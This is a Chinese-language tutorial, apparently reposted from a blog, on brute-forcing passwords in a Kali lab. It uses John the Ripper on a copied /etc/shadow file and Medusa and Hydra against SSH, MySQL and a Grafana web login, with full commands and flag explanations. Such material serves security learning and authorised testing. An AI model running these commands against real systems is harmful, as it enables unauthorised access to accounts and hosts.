文章目錄
- 1. 概述
- 2. 實驗環境
- 3. 破解系統密碼
- 3.1 使用 John the Ripper 破解系統密碼
- 3.2 使用 Medusa 破解系統密碼
- 3.3 使用 Hydra 破解系統密碼
- 4. 破解應用密碼
- 4.1 使用 Medusa 破解應用密碼
- 4.2 使用 Hydra 破解應用密碼
????本文簡述Linux下暴力破解密碼的工具,包括 John the Ripper,Medusa,Hydra,
1. 概述
| 名稱 | 適用范圍 | 優點 | 缺點 |
|---|---|---|---|
| John the Ripper | 作業系統 | 破解速度快 | 不能破解應用密碼 |
| Medusa | 作業系統、部分應用 | 支持mysql破解,支持批量破解 | 破解SSH速度慢,破解網頁有局限 |
| Hydra | 作業系統、大部分應用 | 支持網頁破解,支持批量破解 | 破解SSH速度慢 |
????作業系統密碼的暴力破解推薦John the Ripper,應用密碼的破解推薦Hydra和Medusa,
2. 實驗環境
????作業系統:kali7-amd64
????字典:John the Ripper原始碼安裝包自帶字典password.lst,內含3546個常見密碼,

3. 破解系統密碼
3.1 使用 John the Ripper 破解系統密碼
????將待破解主機的 /etc/shadow 檔案放到指定目錄下,使用 john 命令進行暴力破解
# john --wordlist=password.lst /root/test/shadow

????查詢已經破解的密碼,示例中root用戶的密碼為test,
# john --show /root/test/shadow

3.2 使用 Medusa 破解系統密碼
????ip.txt存放待測驗主機,username.txt存放用于破解的用戶名,

????Medusa使用模塊對特定應用進行爆破,常見模塊有ssh.mod,http.mod,

????以web-form模塊為例,查詢模塊使用方法,

????SSH爆破命令
# medusa -H /root/ip.txt -U /root/test/username.txt -P /root/test/password.lst -e ns -M ssh -O final.txt -r 0 -F
????命令比較長,需要根據實際情況進行配置,
????-H 后接檔案,檔案包含待測主機名或IP地址;
????-U 后接檔案,檔案包含用來嘗試登陸的用戶名;
????-P 后接字典檔案;
????-e ns 表示增加2種密碼測驗,n表示無密碼,s表示username與密碼一致;
????-O 表示輸出到檔案;
????-r 表示重新嘗試爆破的等待秒數;
????-F 表示在任何主機上找到第一個有效用戶名/密碼后停止,
????由于爆破時間太長,將root寫到 /root/test/username.txt 的第一行節約時間,爆破結果如下圖,

3.3 使用 Hydra 破解系統密碼
????SSH爆破命令
# hydra -L /root/test/username.txt -P /root/test/password.lst -f 192.168.198.144 ssh -t 1 -vV
????命令比較長,需要根據實際情況進行配置,
????-L 后接檔案,檔案包含用來嘗試登陸的用戶名;
????-P 后接字典檔案;
????-F 表示在本主機上找到第一個有效用戶名/密碼后停止;
????-t 表示任務運行時并行的連接數;
????-vV 展示爆破進度,
????執行效果如下圖,

4. 破解應用密碼
4.1 使用 Medusa 破解應用密碼
????以 Mysql 為例,破解命令為:
# medusa -H /root/ip.txt -U /root/test/username.txt -P /root/test/password.lst -e ns -M mysql -O final.txt -r 0 -F
????爆破速度很快,為了便于觀察,將zabbix寫到 /root/test/username.txt 的第一行節約時間,爆破結果如下圖,

4.2 使用 Hydra 破解應用密碼
????安裝好grafana,以grafana的web登錄界面作為靶機,埠為3000,破解命令為:
hydra -l admin -P /root/test/password.lst -t 1 -vV -e ns -f 192.168.198.144 -s 3000 http-get /login
????爆破結果如下圖,

轉載請註明出處,本文鏈接:https://www.uj5u.com/qita/300686.html
標籤:其他
下一篇:網路安全--SQL注入介紹
